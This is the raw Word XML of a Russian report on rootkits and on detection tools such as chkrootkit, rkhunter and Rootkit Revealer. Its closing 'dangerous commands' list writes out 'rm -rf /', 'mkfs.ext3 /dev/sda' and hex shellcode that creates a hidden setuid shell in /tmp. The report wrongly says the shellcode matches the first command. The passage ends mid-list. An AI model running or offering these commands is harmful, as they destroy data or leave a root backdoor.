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05" w:rsidRPr="00EB34FE" w:rsidRDefault="009562E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB34FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Анализ устройства текущих программ и утилит, в которых организован поиск руткитов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00691656" w:rsidRPr="00691656" w:rsidRDefault="00691656" w:rsidP="00691656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Руткит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</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tooltip="Английский язык" w:history="1">
        <w:r w:rsidRPr="00EB34F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англ.</w:t>
        </w:r>
      </w:hyperlink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691656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en" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>rootkit</w:t>
      </w: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то есть «набор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9" w:tooltip="Root (суперпользователь)" w:history="1">
        <w:r w:rsidRPr="00EB34F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root</w:t>
        </w:r>
      </w:hyperlink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'а») — набор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10" w:tooltip="Компьютерная программа" w:history="1">
        <w:r w:rsidRPr="00EB34FE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  <w:lang w:eastAsia="ru-RU"/>
          </w:rPr>
          <w:t>программных средств</w:t>
        </w:r>
      </w:hyperlink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например, исполняемых файлов, скриптов, конфигурационных файлов), для обеспечения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00691656" w:rsidRPr="00691656" w:rsidRDefault="00691656" w:rsidP="0069165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аскировки объектов (процессов, файлов, директорий, драйверов)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00691656" w:rsidRPr="00691656" w:rsidRDefault="00691656" w:rsidP="0069165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троля (событий, происходящих в системе)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00691656" w:rsidRPr="00EB34FE" w:rsidRDefault="00691656" w:rsidP="00691656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69165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бора данных (параметров системы)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00555D29" w:rsidRPr="00EB34FE" w:rsidRDefault="00555D29" w:rsidP="00555D29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становка руткитов могут быть автоматизированы или злоумышленник может установить его, как только он получит  пользовательский доступ от администратора системы ( доступ рута). Получение этого доступа является результатом прямого нападения на систему (т.е. эксплуатируя известную уязвимость, пароль (либо «трещин», привилегий или социальной инженерии)). После установки, становится возможным скрыть вторжение а также поддерживать привилегированный доступ. Хакер может обойти разные защиты узнав какую то уязвимость системы, различных утилит, портов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00691656" w:rsidRPr="00EB34FE" w:rsidRDefault="00FC3CD0" w:rsidP="0069165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сточник: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00691656" w:rsidRPr="00EB34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0%D1%83%D1%82%D0%BA%D0%B8%D1%82</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003950D8" w:rsidRPr="00EB34FE" w:rsidRDefault="00691656" w:rsidP="0069165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новой антивирусного ПО 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является сканирующий движок( сканер) , представленный как правило в виде файла библиотеки (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ll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, т.</w:t>
      </w:r>
      <w:r w:rsidR="00E57DAA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3950D8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 он может быть использован несколькими программами пакета.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003950D8" w:rsidRPr="00EB34FE" w:rsidRDefault="003950D8" w:rsidP="00691656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нируют обычно:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003950D8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извольные файлы, папки, диски</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003950D8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се загруженные в память процессы и их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dll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файлы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003950D8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грузочные записи диска(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MRB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</w:p>
    <w:p w:rsidR="00691656" w:rsidRPr="00EB34FE" w:rsidRDefault="003950D8" w:rsidP="003950D8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стему – поиск следов зловреда. Проверяют системные папки (поиск определенных файлов), сканируют реестр (следы в автозагрузке и реестре)</w:t>
      </w:r>
      <w:r w:rsidR="00AA415D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иды сканирования: сигнатурный и эвристический.</w:t>
      </w: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нирование на основе сигнатур(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hash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scan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): проверка сигнатур файлов со словарем </w:t>
      </w:r>
      <w:r w:rsidR="007E154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(обычно это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md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5-хэши на основе известного вируса). Файл считается зараженным, если его хеш обнаружен в базу сигнатур. </w:t>
      </w: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игнатурный метод позволяет выявить атаку без ложных срабатываний (в отличие от эвристического)</w:t>
      </w:r>
      <w:r w:rsidR="008D29B7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но невозможно выявить новый вирусы, которые не занесены в базу, не выя</w:t>
      </w:r>
      <w:r w:rsidR="00066E33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ляет полиморфные и шифрующиеся вирусы, так</w:t>
      </w:r>
      <w:r w:rsidR="008D29B7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же невысока скорость.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00873658" w:rsidRPr="00CD5F96" w:rsidRDefault="00873658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C3CD0" w:rsidRPr="00CD5F96" w:rsidRDefault="00FC3CD0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73658" w:rsidRPr="00EB34FE" w:rsidRDefault="00873658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вристическое сканирование предполагает поиск вредоносного ПО на основе заранее известных характеристик(</w:t>
      </w:r>
      <w:r w:rsidR="00262507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ристик).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A76E47" w:rsidRPr="00EB34FE" w:rsidRDefault="0060235E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Как правило вирусы создают </w:t>
      </w:r>
      <w:r w:rsidR="007E154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ределенные файлы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которые можно выявить. Для руткитов характерна загрузочная запись. Для этого можно считать </w:t>
      </w:r>
      <w:r w:rsidR="006972F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грузочную запись двумя путями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: с помощью прямого доступа к диску и с помощью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api</w:t>
      </w:r>
      <w:r w:rsidR="006972F1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а затем сравнить результаты; если они будут различны, имеет место подмена системных функций </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A76E47" w:rsidRPr="00EB34FE" w:rsidRDefault="00A76E47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8D29B7" w:rsidRPr="00EB34FE" w:rsidRDefault="00FC3CD0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же необходимы дополнительно список файлов, которые не наносят вреда системе и которым мы доверяем, но на них происходит срабатывание сканера(белый список) и распаковщики и дешифровщики, чтобы сканировать содержимое архивов и зашифрованных файлов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC3CD0" w:rsidRPr="00EB34FE" w:rsidRDefault="00FC3CD0" w:rsidP="00FC3CD0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сточник: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00EB34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ahabr.ru/post/145948/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00FC3CD0" w:rsidRPr="00EB34FE" w:rsidRDefault="00555D29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аспространенные программы и утилиты для поиска руткитов в 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Linux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555D29" w:rsidRPr="006F520C" w:rsidRDefault="00555D29" w:rsidP="006F520C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="336" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="252525"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F520C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="252525"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Инструмент chkrootkit (Check Rootkit).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00555D29" w:rsidRPr="00EB34FE" w:rsidRDefault="00D90B0B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то скрипт с помощью обычных инструментов UNIX / Linux (таких как strings и grep команд) дают возможность искать основные системные программы для сетей/ подписей сравнивая в файловой системе /proc  файлов с выводом команды ps (состояние процесса), чтобы искать разные расхождения.</w:t>
      </w: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Утилита имеет в себе модули для различного сканирования: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rootkit — Модуль который проверяет вашу ОС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ifpromisc — Служит для поиска интерфейса (ов),  которые работают в режимах захвата пакетов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lastlog — Служит для обнаружения различных фактов удаления записей из журнального файла lastlog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wtmp — Служит для обнаружения фактов удаления записей из журнального файла wtmp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eck_wtmpx — Служит для обнаружения фактов удаления записей из журнального файла (только в Solaris)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chkproc — Ищет следы от троянов LKM (Linux Kernel Module — модуль ядра Linux.)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chkdirs — Ищет следы от троянов LKM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90B0B" w:rsidRPr="00E85734" w:rsidRDefault="00D90B0B" w:rsidP="00E85734">
      <w:pPr>
        <w:pStyle w:val="a5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strings — Утилита для быстроты поиска и замены текстовых строк.</w:t>
      </w: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0B0B" w:rsidRPr="00EB34FE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то может эта утилита найти</w:t>
      </w:r>
      <w:r w:rsidR="00040D40"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различное нежелательное ПО и руткиты)</w:t>
      </w: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90B0B" w:rsidRDefault="00D90B0B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5438775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1" name="Рисунок 1" descr="Список что может найти chkroot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что может найти chkrootk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20C" w:rsidRPr="00EB34FE" w:rsidRDefault="006F520C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41A67" w:rsidRPr="00EB34FE" w:rsidRDefault="00941A67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тилита chkrootkit может использовать и другие утилиты для проверки, такие как awk, cut, egrep, find, head, id, ls, netstat, ps, strings, sed, uname. Если эти утилиты недоступны в пути поиска, то нужно указать путь к ним с помощью опции -p.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F520C" w:rsidRPr="00DF2329" w:rsidRDefault="00941A67" w:rsidP="00DF2329">
      <w:pPr>
        <w:ind w:firstLine="708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</w:pPr>
      <w:r w:rsidRPr="006F520C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  <w:lastRenderedPageBreak/>
        <w:t>Инструмент rkhunter (Rootkit Hunter).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941A67" w:rsidRPr="00EB34FE" w:rsidRDefault="00941A67" w:rsidP="00F910A2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB34FE">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>RkHunter (Rootkit Hunter) является Unix-инструментом, который сканирует вашу систему на наличие руткитов, бэкдоров и возможных локальных эксплойтов. Она делает это путем сравнения SHA-1 хэшей важных файлов с известными хорошими базами данных в онлайновом режиме, а так же поиск каталогов по умолчанию (руткитов),</w:t>
      </w:r>
      <w:r w:rsidR="006F520C">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F520C" w:rsidRPr="006F520C">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>проводит проверку сетевых портов и интерфейсов, проводит проверку системного</w:t>
      </w:r>
      <w:r w:rsidR="006F520C" w:rsidRPr="006F520C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="006F520C" w:rsidRPr="006F520C">
        <w:rPr>
          <w:rStyle w:val="txb"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>boot</w:t>
      </w:r>
      <w:r w:rsidR="006F520C" w:rsidRPr="006F520C">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, проводит проверку групп и аккаунтов, проводит проверку системных конфигурационных файлов, проводит пр</w:t>
      </w:r>
      <w:r w:rsidR="00F910A2">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>оверку файловой системы в целом,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB34FE">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> неправильных разрешений, скрытых файлов, подозрительных строк в модулей ядра для Linux и FreeBSD.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941A67" w:rsidRDefault="00941A67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тот инструмент использует сигнатурный метод, т. к после установки конфигурации необходимо сделать «слепок» ОС(первоначальная база данных свойств различных команд), для того, чтобы было можно сравнивать текущее состояние системы с состоянием команд в этой БД.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E85734" w:rsidRPr="00EB34FE" w:rsidRDefault="00E85734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я проверка записывается в файл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txb"/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var/log/rkhunter/rkhunter .log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941A67" w:rsidRPr="00EB34FE" w:rsidRDefault="00941A67" w:rsidP="00941A67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B34F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анирование выполняется в нескольких режимах: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щет уязвимости в командах;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иск rootkits;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верка network сети;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941A67" w:rsidRPr="00E85734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верка локального хоста;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941A67" w:rsidRDefault="00941A67" w:rsidP="00E8573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85734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сле чего нам покажут полную статистику.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040515C" w:rsidRDefault="0040515C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0515C" w:rsidRDefault="0040515C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40515C" w:rsidRPr="00132513" w:rsidRDefault="0040515C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ществует такая интересная утилита, как</w:t>
      </w:r>
      <w:r w:rsidR="00132513"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4" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00132513">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="4B5B6E"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>Rootkit Revealer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0013251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r w:rsidRPr="00132513">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00132513">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="4B5B6E"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>Марка Руссиновича</w:t>
        </w:r>
      </w:hyperlink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утверждению ее создателя, она обнаруживает все руткиты, представленные на</w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00132513">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="4B5B6E"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>www.rootkits.com</w:t>
        </w:r>
      </w:hyperlink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не соответствует действительности — тривиальная проверка выявляет большое количество малвари, отслеживающей запуск Rootkit Revealer’а и модифицирующей его код в памяти таким</w:t>
      </w:r>
      <w:r w:rsidRPr="0013251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м, чтобы он ничего не показывал. Естественно, подобная техника работает только со строго определенными версиями Rootkit Revealer’а</w:t>
      </w:r>
      <w:r w:rsidRPr="0013251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40515C" w:rsidRDefault="0040515C" w:rsidP="0040515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тому же Rootkit Revealer находит только те руткиты, которые: а) </w:t>
      </w:r>
      <w:r w:rsidRPr="0013251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ифицируют реестр и/или файловую систему</w:t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б) </w:t>
      </w:r>
      <w:r w:rsidRPr="00132513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рывают следы своего присутствия</w:t>
      </w:r>
      <w:r w:rsidRPr="001325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Если хотя бы одно из этих условий не выполняется, руткит не будет обнаружен. Анализ кода некоторых руткитов показывает, что они отслеживают появление окна Rootkit Revealer’а и прекращают свою маскировку на время его работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009831E9" w:rsidRDefault="009831E9" w:rsidP="0040515C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сточник: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00DE6CD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xakep.ru/2008/03/20/42886/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CD5F96" w:rsidRDefault="00CD5F96" w:rsidP="0040515C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F96" w:rsidRDefault="00CD5F96" w:rsidP="0040515C">
      <w:pPr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F96" w:rsidRPr="00301EB0" w:rsidRDefault="00CD5F96" w:rsidP="0040515C">
      <w:pPr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301EB0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Опасные команды </w:t>
      </w:r>
      <w:r w:rsidRPr="00301EB0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Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00301EB0">
        <w:rPr>
          <w:rStyle w:val="a4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:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00301EB0" w:rsidRPr="00301EB0" w:rsidRDefault="00301EB0" w:rsidP="00301EB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</w:pP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rm -rf / #with root privilege such as 'sudo'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00301EB0" w:rsidRPr="00301EB0" w:rsidRDefault="00301EB0" w:rsidP="00301EB0">
      <w:pPr>
        <w:pStyle w:val="a5"/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</w:pPr>
      <w:r w:rsidRPr="00301EB0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рекурсивное удаление всех файлов на пк и подключенных носителях</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00301EB0" w:rsidRPr="007C0561" w:rsidRDefault="00301EB0" w:rsidP="00301EB0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char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 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esp</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>[] __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attribute</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>__ ((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section</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>(".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text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"))) /* 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e</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>.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s</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>.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p</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
        </w:rPr>
        <w:br/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release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 */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= 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eb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3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e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b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31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c</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>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a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3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ec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8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</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>9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d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99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1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d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92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d</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>2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e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</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>7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16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</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>7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6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</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>7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6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</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>7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6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c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3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c</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>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7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6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d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73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6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3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4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59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b</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>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b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cd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8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31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c</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>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4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eb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</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>9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e</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>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bd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f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2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2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9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e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2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f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73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8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0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2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d</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>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63\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x</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>00"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"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cp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 -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p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 /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bin</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>/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sh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 /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tmp</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>/.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beyond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; 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chmod</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4755</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>/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tmp</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:r w:rsidRPr="00301EB0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>beyond</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0561">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>;";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00301EB0" w:rsidRDefault="00301EB0" w:rsidP="00301EB0">
      <w:pPr>
        <w:ind w:firstLine="36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Шестнадцатеричный код то же команды, что и в первом примере.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E6DD4" w:rsidRPr="001E6DD4" w:rsidRDefault="001E6DD4" w:rsidP="001E6DD4">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E6DD4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>mkfs.ext3 /dev/sda</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E6DD4" w:rsidRDefault="001E6DD4" w:rsidP="001E6DD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6DD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орматирование устройства /dev/sda с удалением всех файлов на нём.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A07AE" w:rsidRPr="007A07AE" w:rsidRDefault="007A07AE" w:rsidP="007A07AE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4)</w:t>
      </w:r>
      <w:r w:rsidRPr="007A07AE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
